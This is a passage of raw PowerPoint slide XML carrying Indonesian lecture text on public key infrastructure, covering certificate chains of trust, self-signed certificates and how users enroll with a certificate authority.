            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>situasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PKI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mahal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, server web, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> router </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengabaikannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sifat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>divalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="590342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Permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penandatanganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pendaftaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berwenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Proses yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuktikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain Windows, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendaftar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
